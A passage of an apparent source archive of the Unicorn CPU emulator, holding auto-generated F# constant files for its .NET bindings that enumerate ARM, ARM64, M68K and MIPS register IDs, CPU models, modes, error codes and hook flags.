UC_ARM_REG_MVFR0 = 47 let UC_ARM_REG_MVFR1 = 48 let UC_ARM_REG_MVFR2 = 49 let UC_ARM_REG_Q0 = 50 let UC_ARM_REG_Q1 = 51 let UC_ARM_REG_Q2 = 52 let UC_ARM_REG_Q3 = 53 let UC_ARM_REG_Q4 = 54 let UC_ARM_REG_Q5 = 55 let UC_ARM_REG_Q6 = 56 let UC_ARM_REG_Q7 = 57 let UC_ARM_REG_Q8 = 58 let UC_ARM_REG_Q9 = 59 let UC_ARM_REG_Q10 = 60 let UC_ARM_REG_Q11 = 61 let UC_ARM_REG_Q12 = 62 let UC_ARM_REG_Q13 = 63 let UC_ARM_REG_Q14 = 64 let UC_ARM_REG_Q15 = 65 let UC_ARM_REG_R0 = 66 let UC_ARM_REG_R1 = 67 let UC_ARM_REG_R2 = 68 let UC_ARM_REG_R3 = 69 let UC_ARM_REG_R4 = 70 let UC_ARM_REG_R5 = 71 let UC_ARM_REG_R6 = 72 let UC_ARM_REG_R7 = 73 let UC_ARM_REG_R8 = 74 let UC_ARM_REG_R9 = 75 let UC_ARM_REG_R10 = 76 let UC_ARM_REG_R11 = 77 let UC_ARM_REG_R12 = 78 let UC_ARM_REG_S0 = 79 let UC_ARM_REG_S1 = 80 let UC_ARM_REG_S2 = 81 let UC_ARM_REG_S3 = 82 let UC_ARM_REG_S4 = 83 let UC_ARM_REG_S5 = 84 let 
UC_ARM_REG_S6 = 85 let UC_ARM_REG_S7 = 86 let UC_ARM_REG_S8 = 87 let UC_ARM_REG_S9 = 88 let UC_ARM_REG_S10 = 89 let UC_ARM_REG_S11 = 90 let UC_ARM_REG_S12 = 91 let UC_ARM_REG_S13 = 92 let UC_ARM_REG_S14 = 93 let UC_ARM_REG_S15 = 94 let UC_ARM_REG_S16 = 95 let UC_ARM_REG_S17 = 96 let UC_ARM_REG_S18 = 97 let UC_ARM_REG_S19 = 98 let UC_ARM_REG_S20 = 99 let UC_ARM_REG_S21 = 100 let UC_ARM_REG_S22 = 101 let UC_ARM_REG_S23 = 102 let UC_ARM_REG_S24 = 103 let UC_ARM_REG_S25 = 104 let UC_ARM_REG_S26 = 105 let UC_ARM_REG_S27 = 106 let UC_ARM_REG_S28 = 107 let UC_ARM_REG_S29 = 108 let UC_ARM_REG_S30 = 109 let UC_ARM_REG_S31 = 110 let UC_ARM_REG_C1_C0_2 = 111 let UC_ARM_REG_C13_C0_2 = 112 let UC_ARM_REG_C13_C0_3 = 113 let UC_ARM_REG_IPSR = 114 let UC_ARM_REG_MSP = 115 let UC_ARM_REG_PSP = 116 let UC_ARM_REG_CONTROL = 117 let UC_ARM_REG_IAPSR = 118 let UC_ARM_REG_EAPSR = 119 let UC_ARM_REG_XPSR = 120 let UC_ARM_REG_EPSR = 121 let UC_ARM_REG_IEPSR = 122 let UC_ARM_REG_PRIMASK = 123 let UC_ARM_REG_BASEPRI = 124 let UC_ARM_REG_BASEPRI_MAX = 125 let UC_ARM_REG_FAULTMASK = 126 let UC_ARM_REG_APSR_NZCVQ = 127 let UC_ARM_REG_APSR_G = 128 let UC_ARM_REG_APSR_NZCVQG = 129 let UC_ARM_REG_IAPSR_NZCVQ = 130 let UC_ARM_REG_IAPSR_G = 131 let UC_ARM_REG_IAPSR_NZCVQG = 132 let UC_ARM_REG_EAPSR_NZCVQ = 133 let UC_ARM_REG_EAPSR_G = 134 let UC_ARM_REG_EAPSR_NZCVQG = 135 let UC_ARM_REG_XPSR_NZCVQ = 136 let UC_ARM_REG_XPSR_G = 137 let UC_ARM_REG_XPSR_NZCVQG = 138 let UC_ARM_REG_CP_REG = 139 let UC_ARM_REG_ENDING = 140 // alias registers let UC_ARM_REG_R13 = 12 let UC_ARM_REG_R14 = 10 let UC_ARM_REG_R15 = 11 let UC_ARM_REG_SB = 75 let UC_ARM_REG_SL = 76 let UC_ARM_REG_FP = 77 let UC_ARM_REG_IP = 78 unicorn-2.1.1/bindings/dotnet/UnicornEngine/Const/Arm64.fs000066400000000000000000000236101467524106700233540ustar00rootroot00000000000000// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT namespace UnicornEngine.Const open System [] module Arm64 = // ARM64 CPU let UC_CPU_ARM64_A57 = 0 let UC_CPU_ARM64_A53 = 1 let UC_CPU_ARM64_A72 = 2 let UC_CPU_ARM64_MAX = 3 let UC_CPU_ARM64_ENDING = 4 // ARM64 registers let UC_ARM64_REG_INVALID = 0 let UC_ARM64_REG_X29 = 1 let UC_ARM64_REG_X30 = 2 let UC_ARM64_REG_NZCV = 3 let UC_ARM64_REG_SP = 4 let UC_ARM64_REG_WSP = 5 let UC_ARM64_REG_WZR = 6 let UC_ARM64_REG_XZR = 7 let UC_ARM64_REG_B0 = 8 let UC_ARM64_REG_B1 = 9 let UC_ARM64_REG_B2 = 10 let UC_ARM64_REG_B3 = 11 let UC_ARM64_REG_B4 = 12 let UC_ARM64_REG_B5 = 13 let UC_ARM64_REG_B6 = 14 let UC_ARM64_REG_B7 = 15 let UC_ARM64_REG_B8 = 16 let UC_ARM64_REG_B9 = 17 let UC_ARM64_REG_B10 = 18 let UC_ARM64_REG_B11 = 19 let UC_ARM64_REG_B12 = 20 let UC_ARM64_REG_B13 = 21 let UC_ARM64_REG_B14 = 22 let UC_ARM64_REG_B15 = 23 let UC_ARM64_REG_B16 = 24 let UC_ARM64_REG_B17 = 25 let UC_ARM64_REG_B18 = 26 let UC_ARM64_REG_B19 = 27 let UC_ARM64_REG_B20 = 28 let UC_ARM64_REG_B21 = 29 let UC_ARM64_REG_B22 = 30 let UC_ARM64_REG_B23 = 31 let UC_ARM64_REG_B24 = 32 let UC_ARM64_REG_B25 = 33 let UC_ARM64_REG_B26 = 34 let UC_ARM64_REG_B27 = 35 let UC_ARM64_REG_B28 = 36 let UC_ARM64_REG_B29 = 37 let UC_ARM64_REG_B30 = 38 let UC_ARM64_REG_B31 = 39 let UC_ARM64_REG_D0 = 40 let UC_ARM64_REG_D1 = 41 let UC_ARM64_REG_D2 = 42 let UC_ARM64_REG_D3 = 43 let UC_ARM64_REG_D4 = 44 let UC_ARM64_REG_D5 = 45 let UC_ARM64_REG_D6 = 46 let UC_ARM64_REG_D7 = 47 let UC_ARM64_REG_D8 = 48 let UC_ARM64_REG_D9 = 49 let UC_ARM64_REG_D10 = 50 let UC_ARM64_REG_D11 = 51 let UC_ARM64_REG_D12 = 52 let UC_ARM64_REG_D13 = 53 let UC_ARM64_REG_D14 = 54 let UC_ARM64_REG_D15 = 55 let UC_ARM64_REG_D16 = 56 let UC_ARM64_REG_D17 = 57 let UC_ARM64_REG_D18 = 58 let UC_ARM64_REG_D19 = 59 let UC_ARM64_REG_D20 = 60 let UC_ARM64_REG_D21 = 61 let UC_ARM64_REG_D22 = 62 let UC_ARM64_REG_D23 = 63 let UC_ARM64_REG_D24 = 64 let UC_ARM64_REG_D25 = 65 let UC_ARM64_REG_D26 = 66 let UC_ARM64_REG_D27 = 67 let UC_ARM64_REG_D28 = 68 let UC_ARM64_REG_D29 = 69 let UC_ARM64_REG_D30 = 70 let UC_ARM64_REG_D31 = 71 let UC_ARM64_REG_H0 = 72 let UC_ARM64_REG_H1 = 73 let UC_ARM64_REG_H2 = 74 let UC_ARM64_REG_H3 = 75 let UC_ARM64_REG_H4 = 76 let UC_ARM64_REG_H5 = 77 let UC_ARM64_REG_H6 = 78 let UC_ARM64_REG_H7 = 79 let UC_ARM64_REG_H8 = 80 let UC_ARM64_REG_H9 = 81 let UC_ARM64_REG_H10 = 82 let UC_ARM64_REG_H11 = 83 let UC_ARM64_REG_H12 = 84 let UC_ARM64_REG_H13 = 85 let UC_ARM64_REG_H14 = 86 let UC_ARM64_REG_H15 = 87 let UC_ARM64_REG_H16 = 88 let UC_ARM64_REG_H17 = 89 let UC_ARM64_REG_H18 = 90 let UC_ARM64_REG_H19 = 91 let UC_ARM64_REG_H20 = 92 let UC_ARM64_REG_H21 = 93 let UC_ARM64_REG_H22 = 94 let UC_ARM64_REG_H23 = 95 let UC_ARM64_REG_H24 = 96 let UC_ARM64_REG_H25 = 97 let UC_ARM64_REG_H26 = 98 let UC_ARM64_REG_H27 = 99 let UC_ARM64_REG_H28 = 100 let UC_ARM64_REG_H29 = 101 let UC_ARM64_REG_H30 = 102 let UC_ARM64_REG_H31 = 103 let UC_ARM64_REG_Q0 = 104 let UC_ARM64_REG_Q1 = 105 let UC_ARM64_REG_Q2 = 106 let UC_ARM64_REG_Q3 = 107 let UC_ARM64_REG_Q4 = 108 let UC_ARM64_REG_Q5 = 109 let UC_ARM64_REG_Q6 = 110 let UC_ARM64_REG_Q7 = 111 let UC_ARM64_REG_Q8 = 112 let UC_ARM64_REG_Q9 = 113 let UC_ARM64_REG_Q10 = 114 let UC_ARM64_REG_Q11 = 115 let UC_ARM64_REG_Q12 = 116 let UC_ARM64_REG_Q13 = 117 let UC_ARM64_REG_Q14 = 118 let UC_ARM64_REG_Q15 = 119 let UC_ARM64_REG_Q16 = 120 let UC_ARM64_REG_Q17 = 121 let UC_ARM64_REG_Q18 = 122 let UC_ARM64_REG_Q19 = 123 let UC_ARM64_REG_Q20 = 124 let UC_ARM64_REG_Q21 = 125 let UC_ARM64_REG_Q22 = 126 let 
UC_ARM64_REG_Q23 = 127 let UC_ARM64_REG_Q24 = 128 let UC_ARM64_REG_Q25 = 129 let UC_ARM64_REG_Q26 = 130 let UC_ARM64_REG_Q27 = 131 let UC_ARM64_REG_Q28 = 132 let UC_ARM64_REG_Q29 = 133 let UC_ARM64_REG_Q30 = 134 let UC_ARM64_REG_Q31 = 135 let UC_ARM64_REG_S0 = 136 let UC_ARM64_REG_S1 = 137 let UC_ARM64_REG_S2 = 138 let UC_ARM64_REG_S3 = 139 let UC_ARM64_REG_S4 = 140 let UC_ARM64_REG_S5 = 141 let UC_ARM64_REG_S6 = 142 let UC_ARM64_REG_S7 = 143 let UC_ARM64_REG_S8 = 144 let UC_ARM64_REG_S9 = 145 let UC_ARM64_REG_S10 = 146 let UC_ARM64_REG_S11 = 147 let UC_ARM64_REG_S12 = 148 let UC_ARM64_REG_S13 = 149 let UC_ARM64_REG_S14 = 150 let UC_ARM64_REG_S15 = 151 let UC_ARM64_REG_S16 = 152 let UC_ARM64_REG_S17 = 153 let UC_ARM64_REG_S18 = 154 let UC_ARM64_REG_S19 = 155 let UC_ARM64_REG_S20 = 156 let UC_ARM64_REG_S21 = 157 let UC_ARM64_REG_S22 = 158 let UC_ARM64_REG_S23 = 159 let UC_ARM64_REG_S24 = 160 let UC_ARM64_REG_S25 = 161 let UC_ARM64_REG_S26 = 162 let UC_ARM64_REG_S27 = 163 let UC_ARM64_REG_S28 = 164 let UC_ARM64_REG_S29 = 165 let UC_ARM64_REG_S30 = 166 let UC_ARM64_REG_S31 = 167 let UC_ARM64_REG_W0 = 168 let UC_ARM64_REG_W1 = 169 let UC_ARM64_REG_W2 = 170 let UC_ARM64_REG_W3 = 171 let UC_ARM64_REG_W4 = 172 let UC_ARM64_REG_W5 = 173 let UC_ARM64_REG_W6 = 174 let UC_ARM64_REG_W7 = 175 let UC_ARM64_REG_W8 = 176 let UC_ARM64_REG_W9 = 177 let UC_ARM64_REG_W10 = 178 let UC_ARM64_REG_W11 = 179 let UC_ARM64_REG_W12 = 180 let UC_ARM64_REG_W13 = 181 let UC_ARM64_REG_W14 = 182 let UC_ARM64_REG_W15 = 183 let UC_ARM64_REG_W16 = 184 let UC_ARM64_REG_W17 = 185 let UC_ARM64_REG_W18 = 186 let UC_ARM64_REG_W19 = 187 let UC_ARM64_REG_W20 = 188 let UC_ARM64_REG_W21 = 189 let UC_ARM64_REG_W22 = 190 let UC_ARM64_REG_W23 = 191 let UC_ARM64_REG_W24 = 192 let UC_ARM64_REG_W25 = 193 let UC_ARM64_REG_W26 = 194 let UC_ARM64_REG_W27 = 195 let UC_ARM64_REG_W28 = 196 let UC_ARM64_REG_W29 = 197 let UC_ARM64_REG_W30 = 198 let UC_ARM64_REG_X0 = 199 let UC_ARM64_REG_X1 = 200 let UC_ARM64_REG_X2 = 201 let UC_ARM64_REG_X3 = 202 let UC_ARM64_REG_X4 = 203 let UC_ARM64_REG_X5 = 204 let UC_ARM64_REG_X6 = 205 let UC_ARM64_REG_X7 = 206 let UC_ARM64_REG_X8 = 207 let UC_ARM64_REG_X9 = 208 let UC_ARM64_REG_X10 = 209 let UC_ARM64_REG_X11 = 210 let UC_ARM64_REG_X12 = 211 let UC_ARM64_REG_X13 = 212 let UC_ARM64_REG_X14 = 213 let UC_ARM64_REG_X15 = 214 let UC_ARM64_REG_X16 = 215 let UC_ARM64_REG_X17 = 216 let UC_ARM64_REG_X18 = 217 let UC_ARM64_REG_X19 = 218 let UC_ARM64_REG_X20 = 219 let UC_ARM64_REG_X21 = 220 let UC_ARM64_REG_X22 = 221 let UC_ARM64_REG_X23 = 222 let UC_ARM64_REG_X24 = 223 let UC_ARM64_REG_X25 = 224 let UC_ARM64_REG_X26 = 225 let UC_ARM64_REG_X27 = 226 let UC_ARM64_REG_X28 = 227 let UC_ARM64_REG_V0 = 228 let UC_ARM64_REG_V1 = 229 let UC_ARM64_REG_V2 = 230 let UC_ARM64_REG_V3 = 231 let UC_ARM64_REG_V4 = 232 let UC_ARM64_REG_V5 = 233 let UC_ARM64_REG_V6 = 234 let UC_ARM64_REG_V7 = 235 let UC_ARM64_REG_V8 = 236 let UC_ARM64_REG_V9 = 237 let UC_ARM64_REG_V10 = 238 let UC_ARM64_REG_V11 = 239 let UC_ARM64_REG_V12 = 240 let UC_ARM64_REG_V13 = 241 let UC_ARM64_REG_V14 = 242 let UC_ARM64_REG_V15 = 243 let UC_ARM64_REG_V16 = 244 let UC_ARM64_REG_V17 = 245 let UC_ARM64_REG_V18 = 246 let UC_ARM64_REG_V19 = 247 let UC_ARM64_REG_V20 = 248 let UC_ARM64_REG_V21 = 249 let UC_ARM64_REG_V22 = 250 let UC_ARM64_REG_V23 = 251 let UC_ARM64_REG_V24 = 252 let UC_ARM64_REG_V25 = 253 let UC_ARM64_REG_V26 = 254 let UC_ARM64_REG_V27 = 255 let UC_ARM64_REG_V28 = 256 let UC_ARM64_REG_V29 = 257 let UC_ARM64_REG_V30 = 258 let UC_ARM64_REG_V31 = 259 // 
pseudo registers let UC_ARM64_REG_PC = 260 let UC_ARM64_REG_CPACR_EL1 = 261 // thread registers, depreciated, use UC_ARM64_REG_CP_REG instead let UC_ARM64_REG_TPIDR_EL0 = 262 let UC_ARM64_REG_TPIDRRO_EL0 = 263 let UC_ARM64_REG_TPIDR_EL1 = 264 let UC_ARM64_REG_PSTATE = 265 // exception link registers, depreciated, use UC_ARM64_REG_CP_REG instead let UC_ARM64_REG_ELR_EL0 = 266 let UC_ARM64_REG_ELR_EL1 = 267 let UC_ARM64_REG_ELR_EL2 = 268 let UC_ARM64_REG_ELR_EL3 = 269 // stack pointers registers, depreciated, use UC_ARM64_REG_CP_REG instead let UC_ARM64_REG_SP_EL0 = 270 let UC_ARM64_REG_SP_EL1 = 271 let UC_ARM64_REG_SP_EL2 = 272 let UC_ARM64_REG_SP_EL3 = 273 // other CP15 registers, depreciated, use UC_ARM64_REG_CP_REG instead let UC_ARM64_REG_TTBR0_EL1 = 274 let UC_ARM64_REG_TTBR1_EL1 = 275 let UC_ARM64_REG_ESR_EL0 = 276 let UC_ARM64_REG_ESR_EL1 = 277 let UC_ARM64_REG_ESR_EL2 = 278 let UC_ARM64_REG_ESR_EL3 = 279 let UC_ARM64_REG_FAR_EL0 = 280 let UC_ARM64_REG_FAR_EL1 = 281 let UC_ARM64_REG_FAR_EL2 = 282 let UC_ARM64_REG_FAR_EL3 = 283 let UC_ARM64_REG_PAR_EL1 = 284 let UC_ARM64_REG_MAIR_EL1 = 285 let UC_ARM64_REG_VBAR_EL0 = 286 let UC_ARM64_REG_VBAR_EL1 = 287 let UC_ARM64_REG_VBAR_EL2 = 288 let UC_ARM64_REG_VBAR_EL3 = 289 let UC_ARM64_REG_CP_REG = 290 // floating point control and status registers let UC_ARM64_REG_FPCR = 291 let UC_ARM64_REG_FPSR = 292 let UC_ARM64_REG_ENDING = 293 // alias registers let UC_ARM64_REG_IP0 = 215 let UC_ARM64_REG_IP1 = 216 let UC_ARM64_REG_FP = 1 let UC_ARM64_REG_LR = 2 // ARM64 instructions let UC_ARM64_INS_INVALID = 0 let UC_ARM64_INS_MRS = 1 let UC_ARM64_INS_MSR = 2 let UC_ARM64_INS_SYS = 3 let UC_ARM64_INS_SYSL = 4 let UC_ARM64_INS_ENDING = 5 unicorn-2.1.1/bindings/dotnet/UnicornEngine/Const/Common.fs000066400000000000000000000103001467524106700237030ustar00rootroot00000000000000// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT namespace UnicornEngine.Const open System [] module Common = let UC_API_MAJOR = 2 let UC_API_MINOR = 1 let UC_API_PATCH = 0 let UC_API_EXTRA = 255 let UC_VERSION_MAJOR = 2 let UC_VERSION_MINOR = 1 let UC_VERSION_PATCH = 0 let UC_VERSION_EXTRA = 255 let UC_SECOND_SCALE = 1000000 let UC_MILISECOND_SCALE = 1000 let UC_ARCH_ARM = 1 let UC_ARCH_ARM64 = 2 let UC_ARCH_MIPS = 3 let UC_ARCH_X86 = 4 let UC_ARCH_PPC = 5 let UC_ARCH_SPARC = 6 let UC_ARCH_M68K = 7 let UC_ARCH_RISCV = 8 let UC_ARCH_S390X = 9 let UC_ARCH_TRICORE = 10 let UC_ARCH_MAX = 11 let UC_MODE_LITTLE_ENDIAN = 0 let UC_MODE_BIG_ENDIAN = 1073741824 let UC_MODE_ARM = 0 let UC_MODE_THUMB = 16 let UC_MODE_MCLASS = 32 let UC_MODE_V8 = 64 let UC_MODE_ARMBE8 = 1024 let UC_MODE_ARM926 = 128 let UC_MODE_ARM946 = 256 let UC_MODE_ARM1176 = 512 let UC_MODE_MICRO = 16 let UC_MODE_MIPS3 = 32 let UC_MODE_MIPS32R6 = 64 let UC_MODE_MIPS32 = 4 let UC_MODE_MIPS64 = 8 let UC_MODE_16 = 2 let UC_MODE_32 = 4 let UC_MODE_64 = 8 let UC_MODE_PPC32 = 4 let UC_MODE_PPC64 = 8 let UC_MODE_QPX = 16 let UC_MODE_SPARC32 = 4 let UC_MODE_SPARC64 = 8 let UC_MODE_V9 = 16 let UC_MODE_RISCV32 = 4 let UC_MODE_RISCV64 = 8 let UC_ERR_OK = 0 let UC_ERR_NOMEM = 1 let UC_ERR_ARCH = 2 let UC_ERR_HANDLE = 3 let UC_ERR_MODE = 4 let UC_ERR_VERSION = 5 let UC_ERR_READ_UNMAPPED = 6 let UC_ERR_WRITE_UNMAPPED = 7 let UC_ERR_FETCH_UNMAPPED = 8 let UC_ERR_HOOK = 9 let UC_ERR_INSN_INVALID = 10 let UC_ERR_MAP = 11 let UC_ERR_WRITE_PROT = 12 let UC_ERR_READ_PROT = 13 let UC_ERR_FETCH_PROT = 14 let UC_ERR_ARG = 15 let UC_ERR_READ_UNALIGNED = 16 let UC_ERR_WRITE_UNALIGNED = 17 let UC_ERR_FETCH_UNALIGNED = 18 let UC_ERR_HOOK_EXIST = 19 let UC_ERR_RESOURCE = 20 let UC_ERR_EXCEPTION = 21 let UC_ERR_OVERFLOW = 22 let UC_MEM_READ = 16 let UC_MEM_WRITE = 17 let UC_MEM_FETCH = 18 let UC_MEM_READ_UNMAPPED = 19 let UC_MEM_WRITE_UNMAPPED = 20 let UC_MEM_FETCH_UNMAPPED = 21 let UC_MEM_WRITE_PROT = 22 let UC_MEM_READ_PROT = 23 let UC_MEM_FETCH_PROT = 24 let UC_MEM_READ_AFTER = 25 let UC_TCG_OP_SUB = 0 let UC_TCG_OP_FLAG_CMP = 1 let UC_TCG_OP_FLAG_DIRECT = 2 let UC_HOOK_INTR = 1 let UC_HOOK_INSN = 2 let UC_HOOK_CODE = 4 let UC_HOOK_BLOCK = 8 let UC_HOOK_MEM_READ_UNMAPPED = 16 let UC_HOOK_MEM_WRITE_UNMAPPED = 32 let UC_HOOK_MEM_FETCH_UNMAPPED = 64 let UC_HOOK_MEM_READ_PROT = 128 let UC_HOOK_MEM_WRITE_PROT = 256 let UC_HOOK_MEM_FETCH_PROT = 512 let UC_HOOK_MEM_READ = 1024 let UC_HOOK_MEM_WRITE = 2048 let UC_HOOK_MEM_FETCH = 4096 let UC_HOOK_MEM_READ_AFTER = 8192 let UC_HOOK_INSN_INVALID = 16384 let UC_HOOK_EDGE_GENERATED = 32768 let UC_HOOK_TCG_OPCODE = 65536 let UC_HOOK_TLB_FILL = 131072 let UC_HOOK_MEM_UNMAPPED = 112 let UC_HOOK_MEM_PROT = 896 let UC_HOOK_MEM_READ_INVALID = 144 let UC_HOOK_MEM_WRITE_INVALID = 288 let UC_HOOK_MEM_FETCH_INVALID = 576 let UC_HOOK_MEM_INVALID = 1008 let UC_HOOK_MEM_VALID = 7168 let UC_QUERY_MODE = 1 let UC_QUERY_PAGE_SIZE = 2 let UC_QUERY_ARCH = 3 let UC_QUERY_TIMEOUT = 4 let UC_CTL_IO_NONE = 0 let UC_CTL_IO_WRITE = 1 let UC_CTL_IO_READ = 2 let UC_CTL_IO_READ_WRITE = 3 let UC_TLB_CPU = 0 let UC_TLB_VIRTUAL = 1 let UC_CTL_UC_MODE = 0 let UC_CTL_UC_PAGE_SIZE = 1 let UC_CTL_UC_ARCH = 2 let UC_CTL_UC_TIMEOUT = 3 let UC_CTL_UC_USE_EXITS = 4 let UC_CTL_UC_EXITS_CNT = 5 let UC_CTL_UC_EXITS = 6 let UC_CTL_CPU_MODEL = 7 let UC_CTL_TB_REQUEST_CACHE = 8 let UC_CTL_TB_REMOVE_CACHE = 9 let UC_CTL_TB_FLUSH = 10 let UC_CTL_TLB_FLUSH = 11 let UC_CTL_TLB_TYPE = 12 let UC_CTL_TCG_BUFFER_SIZE = 13 let UC_CTL_CONTEXT_MODE = 14 let UC_PROT_NONE = 0 let 
UC_PROT_READ = 1 let UC_PROT_WRITE = 2 let UC_PROT_EXEC = 4 let UC_PROT_ALL = 7 let UC_CTL_CONTEXT_CPU = 1 let UC_CTL_CONTEXT_MEMORY = 2 unicorn-2.1.1/bindings/dotnet/UnicornEngine/Const/M68k.fs000066400000000000000000000020121467524106700232010ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT namespace UnicornEngine.Const open System [] module M68k = // M68K CPU let UC_CPU_M68K_M5206 = 0 let UC_CPU_M68K_M68000 = 1 let UC_CPU_M68K_M68020 = 2 let UC_CPU_M68K_M68030 = 3 let UC_CPU_M68K_M68040 = 4 let UC_CPU_M68K_M68060 = 5 let UC_CPU_M68K_M5208 = 6 let UC_CPU_M68K_CFV4E = 7 let UC_CPU_M68K_ANY = 8 let UC_CPU_M68K_ENDING = 9 // M68K registers let UC_M68K_REG_INVALID = 0 let UC_M68K_REG_A0 = 1 let UC_M68K_REG_A1 = 2 let UC_M68K_REG_A2 = 3 let UC_M68K_REG_A3 = 4 let UC_M68K_REG_A4 = 5 let UC_M68K_REG_A5 = 6 let UC_M68K_REG_A6 = 7 let UC_M68K_REG_A7 = 8 let UC_M68K_REG_D0 = 9 let UC_M68K_REG_D1 = 10 let UC_M68K_REG_D2 = 11 let UC_M68K_REG_D3 = 12 let UC_M68K_REG_D4 = 13 let UC_M68K_REG_D5 = 14 let UC_M68K_REG_D6 = 15 let UC_M68K_REG_D7 = 16 let UC_M68K_REG_SR = 17 let UC_M68K_REG_PC = 18 let UC_M68K_REG_ENDING = 19 unicorn-2.1.1/bindings/dotnet/UnicornEngine/Const/Mips.fs000066400000000000000000000150351467524106700233750ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT namespace UnicornEngine.Const open System [] module Mips = // MIPS32 CPUS let UC_CPU_MIPS32_4KC = 0 let UC_CPU_MIPS32_4KM = 1 let UC_CPU_MIPS32_4KECR1 = 2 let UC_CPU_MIPS32_4KEMR1 = 3 let UC_CPU_MIPS32_4KEC = 4 let UC_CPU_MIPS32_4KEM = 5 let UC_CPU_MIPS32_24KC = 6 let UC_CPU_MIPS32_24KEC = 7 let UC_CPU_MIPS32_24KF = 8 let UC_CPU_MIPS32_34KF = 9 let UC_CPU_MIPS32_74KF = 10 let UC_CPU_MIPS32_M14K = 11 let UC_CPU_MIPS32_M14KC = 12 let UC_CPU_MIPS32_P5600 = 13 let UC_CPU_MIPS32_MIPS32R6_GENERIC = 14 let UC_CPU_MIPS32_I7200 = 15 let UC_CPU_MIPS32_ENDING = 16 // MIPS64 CPUS let UC_CPU_MIPS64_R4000 = 0 let UC_CPU_MIPS64_VR5432 = 1 let UC_CPU_MIPS64_5KC = 2 let UC_CPU_MIPS64_5KF = 3 let UC_CPU_MIPS64_20KC = 4 let UC_CPU_MIPS64_MIPS64R2_GENERIC = 5 let UC_CPU_MIPS64_5KEC = 6 let UC_CPU_MIPS64_5KEF = 7 let UC_CPU_MIPS64_I6400 = 8 let UC_CPU_MIPS64_I6500 = 9 let UC_CPU_MIPS64_LOONGSON_2E = 10 let UC_CPU_MIPS64_LOONGSON_2F = 11 let UC_CPU_MIPS64_MIPS64DSPR2 = 12 let UC_CPU_MIPS64_ENDING = 13 // MIPS registers let UC_MIPS_REG_INVALID = 0 // General purpose registers let UC_MIPS_REG_PC = 1 let UC_MIPS_REG_0 = 2 let UC_MIPS_REG_1 = 3 let UC_MIPS_REG_2 = 4 let UC_MIPS_REG_3 = 5 let UC_MIPS_REG_4 = 6 let UC_MIPS_REG_5 = 7 let UC_MIPS_REG_6 = 8 let UC_MIPS_REG_7 = 9 let UC_MIPS_REG_8 = 10 let UC_MIPS_REG_9 = 11 let UC_MIPS_REG_10 = 12 let UC_MIPS_REG_11 = 13 let UC_MIPS_REG_12 = 14 let UC_MIPS_REG_13 = 15 let UC_MIPS_REG_14 = 16 let UC_MIPS_REG_15 = 17 let UC_MIPS_REG_16 = 18 let UC_MIPS_REG_17 = 19 let UC_MIPS_REG_18 = 20 let UC_MIPS_REG_19 = 21 let UC_MIPS_REG_20 = 22 let UC_MIPS_REG_21 = 23 let UC_MIPS_REG_22 = 24 let UC_MIPS_REG_23 = 25 let UC_MIPS_REG_24 = 26 let UC_MIPS_REG_25 = 27 let UC_MIPS_REG_26 = 28 let UC_MIPS_REG_27 = 29 let UC_MIPS_REG_28 = 30 let UC_MIPS_REG_29 = 31 let UC_MIPS_REG_30 = 32 let UC_MIPS_REG_31 = 33 // DSP registers let UC_MIPS_REG_DSPCCOND = 34 let UC_MIPS_REG_DSPCARRY = 35 let UC_MIPS_REG_DSPEFI = 36 let UC_MIPS_REG_DSPOUTFLAG = 37 let UC_MIPS_REG_DSPOUTFLAG16_19 = 38 let UC_MIPS_REG_DSPOUTFLAG20 = 39 let UC_MIPS_REG_DSPOUTFLAG21 = 40 let UC_MIPS_REG_DSPOUTFLAG22 = 41 let UC_MIPS_REG_DSPOUTFLAG23 = 42 let UC_MIPS_REG_DSPPOS = 43 let 
UC_MIPS_REG_DSPSCOUNT = 44 // ACC registers let UC_MIPS_REG_AC0 = 45 let UC_MIPS_REG_AC1 = 46 let UC_MIPS_REG_AC2 = 47 let UC_MIPS_REG_AC3 = 48 // COP registers let UC_MIPS_REG_CC0 = 49 let UC_MIPS_REG_CC1 = 50 let UC_MIPS_REG_CC2 = 51 let UC_MIPS_REG_CC3 = 52 let UC_MIPS_REG_CC4 = 53 let UC_MIPS_REG_CC5 = 54 let UC_MIPS_REG_CC6 = 55 let UC_MIPS_REG_CC7 = 56 // FPU registers let UC_MIPS_REG_F0 = 57 let UC_MIPS_REG_F1 = 58 let UC_MIPS_REG_F2 = 59 let UC_MIPS_REG_F3 = 60 let UC_MIPS_REG_F4 = 61 let UC_MIPS_REG_F5 = 62 let UC_MIPS_REG_F6 = 63 let UC_MIPS_REG_F7 = 64 let UC_MIPS_REG_F8 = 65 let UC_MIPS_REG_F9 = 66 let UC_MIPS_REG_F10 = 67 let UC_MIPS_REG_F11 = 68 let UC_MIPS_REG_F12 = 69 let UC_MIPS_REG_F13 = 70 let UC_MIPS_REG_F14 = 71 let UC_MIPS_REG_F15 = 72 let UC_MIPS_REG_F16 = 73 let UC_MIPS_REG_F17 = 74 let UC_MIPS_REG_F18 = 75 let UC_MIPS_REG_F19 = 76 let UC_MIPS_REG_F20 = 77 let UC_MIPS_REG_F21 = 78 let UC_MIPS_REG_F22 = 79 let UC_MIPS_REG_F23 = 80 let UC_MIPS_REG_F24 = 81 let UC_MIPS_REG_F25 = 82 let UC_MIPS_REG_F26 = 83 let UC_MIPS_REG_F27 = 84 let UC_MIPS_REG_F28 = 85 let UC_MIPS_REG_F29 = 86 let UC_MIPS_REG_F30 = 87 let UC_MIPS_REG_F31 = 88 let UC_MIPS_REG_FCC0 = 89 let UC_MIPS_REG_FCC1 = 90 let UC_MIPS_REG_FCC2 = 91 let UC_MIPS_REG_FCC3 = 92 let UC_MIPS_REG_FCC4 = 93 let UC_MIPS_REG_FCC5 = 94 let UC_MIPS_REG_FCC6 = 95 let UC_MIPS_REG_FCC7 = 96 // AFPR128 let UC_MIPS_REG_W0 = 97 let UC_MIPS_REG_W1 = 98 let UC_MIPS_REG_W2 = 99 let UC_MIPS_REG_W3 = 100 let UC_MIPS_REG_W4 = 101 let UC_MIPS_REG_W5 = 102 let UC_MIPS_REG_W6 = 103 let UC_MIPS_REG_W7 = 104 let UC_MIPS_REG_W8 = 105 let UC_MIPS_REG_W9 = 106 let UC_MIPS_REG_W10 = 107 let UC_MIPS_REG_W11 = 108 let UC_MIPS_REG_W12 = 109 let UC_MIPS_REG_W13 = 110 let UC_MIPS_REG_W14 = 111 let UC_MIPS_REG_W15 = 112 let 